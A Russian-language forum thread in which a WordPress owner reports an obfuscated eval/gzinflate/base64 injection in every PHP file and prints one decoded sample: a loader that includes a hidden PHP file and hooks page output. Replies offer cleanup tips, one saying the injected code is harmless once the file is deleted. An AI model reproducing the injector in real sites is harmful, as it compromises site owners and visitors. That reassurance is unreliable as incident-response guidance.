Впервые за три года работы со своими сайтами на Вордпресс столкнулся с проблемой, хотел бы получить консультацию от специалистов, знающих PHP не так как я Вся директория, начиная от папки public_html, все файлы PHP в этой директории (и в подпапках до самого конца) я сегодня увидел добавленный вначале каждого файла шифрованный код с таким началом: eval(gzinflate(base64_decode Нашел онлайн-декодер, где открыл парочку шифрованных кодов, один из таких кодов выкладываю на обозрение: Код (Text): /*lvjgfonuiqqzyvohgbltvnbvuftgbefhmttddezzrxfojvnyzk*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/bestword/domains/bestwordpress.org.ua/public_html/test2/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/15b.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}} Все шифрованные имеют разные варианты кода, но в расшифровке все выглядят так, как я вставил выше. Хотел бы услышать от специалистов - что у меня за "срань" появилась на трех сайтах, которые "хостятся" на одном хостинге. Сайты на Wordpress. Версия Wordpress от 3.0 и выше. Спасибо заранее.
FTP пользуюсь постоянно, знаю, что лучше перейти на CCH Все-таки интересно, что эта функция означает? Пытался своим умом - мозг кипит
Этот файл полностью кодированный, и он - не из комплекта инсталляции Wordpress, похоже, что именно он "отдает" команды, шифр большой, открыл через онлайн-декодер но сложно понять, что он там "командует"
oldpepper это и есть тот самый файл-вредитель. достаточно его удалить и больше не создавать. и вообще запретить к нему доступ средствами файловой системы для всех пользователй
Что делать с остальными PHP-файлами, в которых добавлен шифрованный код? Их прилично, руками не удалить, надо переустанавливать Вордпресс и все плагины. Что посоветуете?
oldpepper ничего. судя по всему даже если файла нет, то всё будет работать норм. так что не переживай
Спасибо, у меня пару дней "тормозил" один из сайтов. Я удалил этот файл и сразу все заработало нормально. В любом случае, буду потихоньку все переустанавливать, но уже сейчас вижу, что проблема найдена. Последний вопрос: как файл мог туда попасть? Где "дырку" искать? Хотел бы услышать варианты. CHMOD стоял как надо везде. Причем пострадало три сайта на разных серверах. FTP? Или что-то другое?
oldpepper неизвестно. советую везде сменить пароли. и не факт, что заражены были только эти сайты. возможно кто-то заразил весь хостинг-сервера и все сайты на них.
Похожая ситуация, тоже eval(gzinflate(base64_decode(...., но кодированный 25 раз. Раскодирую, а там снова eval(gzinflate(base64_decode(.... В общем помог online сервис http://www.mobilefish.com/services/eval_gzinflate_base64/ev ... base64.php
Можно перебрать все файлы и вырезать регуляркой этот код. Ничего не сломается, делал на сайте с тысячами файлов =)